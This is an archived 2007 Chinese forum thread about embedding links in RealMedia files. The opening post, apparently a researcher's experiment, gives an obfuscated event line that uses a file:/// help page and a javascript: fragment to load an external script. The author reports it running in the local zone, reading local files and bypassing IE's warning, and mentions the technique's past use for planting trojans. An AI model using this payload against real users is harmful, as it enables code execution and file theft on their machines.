找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1617|回复: 2

rm格式插入广告的办法

[复制链接]

42

主题

1479

回帖

2057

牛毛

二级牛人

广结善缘,阿弥托佛:24616107

积分
2077
QQ
发表于 2007-12-11 16:41:29 | 显示全部楼层 来自 湖北省荆门市
我用的是工具插入的,好久都没用过了

25

主题

140

回帖

216

牛毛

一级牛人

积分
216
发表于 2007-12-11 21:04:23 | 显示全部楼层 来自 黑龙江省鹤岗市
电影被挂马 要用什么工具整开阿

9

主题

20

回帖

38

牛毛

初生牛犊

积分
38
 楼主| 发表于 2007-12-11 15:38:27 | 显示全部楼层 |阅读模式 来自 湖北省武汉市武昌区
很久以前就有这个东西,当时都是用来挂马的,不过忽然想起来,如果能跳到javascript:这样的格式在本地执行js代码意义还是有点的吧,于是测试了下.结果很让人沮丧,realplay对这个好象倒是有限制,而且查看被插入的rm文件里看出应该是本身就做了限制,看来支持的协议不多啊....于是试试file:///,结果发现是支持的,于是想到前段时间的html injection,如果加起来应该有点效果.

以下是引用片段:
以下是代码片段:
u 00:00:02 00:00:05 file://C:\\WINDOWS\\Help\\iisHelp\\common\\400.htm#javascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,
47,116,101,115,116,46,106,115,62,60,47,115,99,114,105,112,116,62))/


  这段代码插进去会出现一个诡异的连接,点击下会执行我指定的js(微软的工程师还是很小心的,暂时正常情况下找到的html就这一个,而且还要点......),而且事实证明的确是本地域执行的,可以读本地的文件,呵呵......而且在realone播放的情况下,ie那个本地执行js代码的警告居然会神奇地消失,于是放到html页面播放,果然很郁闷,打开任何html都会警告,不过还是神奇地能打开本地域的文件.....正常下用window.open是不可以的.....域的限制是可以突破,希望能找到个本地存在问题的html就OK啦,呵呵.......

  真希望这些边缘的地方能出点问题,我感觉还是可能的 :)
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5用户社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-10 13:49 , Processed in 0.126490 second(s), 35 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表